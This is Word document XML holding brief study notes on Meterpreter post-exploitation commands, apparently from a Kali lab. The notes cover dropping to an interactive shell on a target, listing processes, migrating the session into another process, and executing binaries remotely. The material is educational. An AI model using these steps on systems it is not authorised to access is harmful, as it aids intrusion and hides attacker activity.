    <w:p w14:paraId="34483B9A" w14:textId="65718FBE" w:rsidR="0084535A" w:rsidRDefault="0084535A">
      <w:r>
        <w:t># native shell of the system. (cmd on window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFDEF3B" w14:textId="1F371BBB" w:rsidR="0084535A" w:rsidRDefault="0084535A">
      <w:r>
        <w:t>#in kali it opens the terminal session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA55817" w14:textId="77777777" w:rsidR="0084535A" w:rsidRDefault="0084535A"/>
    <w:p w14:paraId="32DEEEDB" w14:textId="69E85803" w:rsidR="0084535A" w:rsidRDefault="0084535A">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A0F9BA3" w14:textId="4F382172" w:rsidR="0084535A" w:rsidRDefault="0084535A">
      <w:r>
        <w:t xml:space="preserve">#native </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D0633" w14:textId="77777777" w:rsidR="00512B42" w:rsidRDefault="00512B42"/>
    <w:p w14:paraId="101793D7" w14:textId="04B1C05B" w:rsidR="00117DF3" w:rsidRDefault="00117DF3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ctrl+c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12C2566F" w14:textId="0453B3A3" w:rsidR="008204C8" w:rsidRDefault="00117DF3">
      <w:r>
        <w:t>#Terminate that channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD8A9B" w14:textId="6B02CE7D" w:rsidR="008204C8" w:rsidRDefault="008204C8">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>back</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73191867" w14:textId="77777777" w:rsidR="008204C8" w:rsidRDefault="008204C8"/>
    <w:p w14:paraId="784B0881" w14:textId="3CF7FF7D" w:rsidR="008204C8" w:rsidRDefault="008204C8">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02F8BA8E" w14:textId="76DDB3BF" w:rsidR="008204C8" w:rsidRDefault="008204C8">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the process run on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105BD146" w14:textId="3F522C00" w:rsidR="008204C8" w:rsidRDefault="008204C8">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FC4F6" w14:textId="024E9586" w:rsidR="008204C8" w:rsidRDefault="008204C8">
      <w:r>
        <w:t xml:space="preserve">Migrate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AB159D9" w14:textId="60A096BD" w:rsidR="008204C8" w:rsidRDefault="008204C8">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>migrate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to that process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A986813" w14:textId="77777777" w:rsidR="00512B42" w:rsidRDefault="00512B42"/>
    <w:p w14:paraId="51BE7C72" w14:textId="311191FA" w:rsidR="00512B42" w:rsidRDefault="00512B42">
      <w:r>
        <w:t>Migrate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -N </w:t>
      </w:r>
      <w:r>
        <w:t>name of process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AF743B" w14:textId="39412C58" w:rsidR="00512B42" w:rsidRDefault="00512B42">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>migrate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to process by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DB0528" w14:textId="77777777" w:rsidR="00512B42" w:rsidRDefault="00512B42"/>
    <w:p w14:paraId="3B21A4E7" w14:textId="2C00D7B0" w:rsidR="00512B42" w:rsidRDefault="00512B42">
      <w:r>
        <w:t xml:space="preserve">Execute -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C065E6B" w14:textId="40B42D31" w:rsidR="00512B42" w:rsidRDefault="00512B42">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="009F07FB" w:rsidRPr="009F07FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>creates a new process</w:t>
      </w:r>
      <w:r w:rsidR="009F07FB" w:rsidRPr="009F07FB">
        <w:t xml:space="preserve"> on the target and runs the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F07FB" w:rsidRPr="009F07FB">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F07FB" w:rsidRPr="009F07FB">
        <w:t xml:space="preserve"> binary in that process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D52DE56" w14:textId="77777777" w:rsidR="00512B42" w:rsidRDefault="00512B42"/>
    <w:p w14:paraId="38471FDB" w14:textId="0939B618" w:rsidR="00512B42" w:rsidRDefault="00512B42">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E40B9FB" w14:textId="4454A440" w:rsidR="00512B42" w:rsidRDefault="00512B42">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the directory name test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8320D" w14:textId="28977D6F" w:rsidR="00512B42" w:rsidRDefault="00512B42">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1E259" w14:textId="77777777" w:rsidR="00512B42" w:rsidRDefault="00512B42"/>
    <w:p w14:paraId="49A884C3" w14:textId="440C75F7" w:rsidR="00512B42" w:rsidRDefault="00512B42">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rmdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7C409" w14:textId="251B4ECA" w:rsidR="00EB1ABE" w:rsidRDefault="00512B42">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remove</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65CBB982" w14:textId="77777777" w:rsidR="00D671DE" w:rsidRDefault="00D671DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="731792BA" w14:textId="219ED7DB" w:rsidR="006C521D" w:rsidRPr="006C521D" w:rsidRDefault="006C521D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C521D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F667E90" w14:textId="31F9A3FE" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Advanced version of terminal (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) and window (cmd).</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006C5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A9"/>
    <w:rsid w:val="00117DF3"/>
    <w:rsid w:val="001979A9"/>
    <w:rsid w:val="002A3C7D"/>
    <w:rsid w:val="00440314"/>
    <w:rsid w:val="00512B42"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="0056753C"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005B6C5A"/>
    <w:rsid w:val="006C521D"/>
    <w:rsid w:val="00740DA0"/>
    <w:rsid w:val="008204C8"/>
    <w:rsid w:val="0084535A"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00857A89"/>
    <w:rsid w:val="00884117"/>
    <w:rsid w:val="00964875"/>
    <w:rsid w:val="009F07FB"/>
    <w:rsid w:val="00B46B6F"/>
    <w:rsid w:val="00D671DE"/>
    <w:rsid w:val="00EB1ABE"/>
    <w:rsid w:val="00F23464"/>
    <w:rsid w:val="00F7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D5B6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AEC3B16A-B6F0-4A40-9CEB-3026FF2B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29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-09T06:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-09T06:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>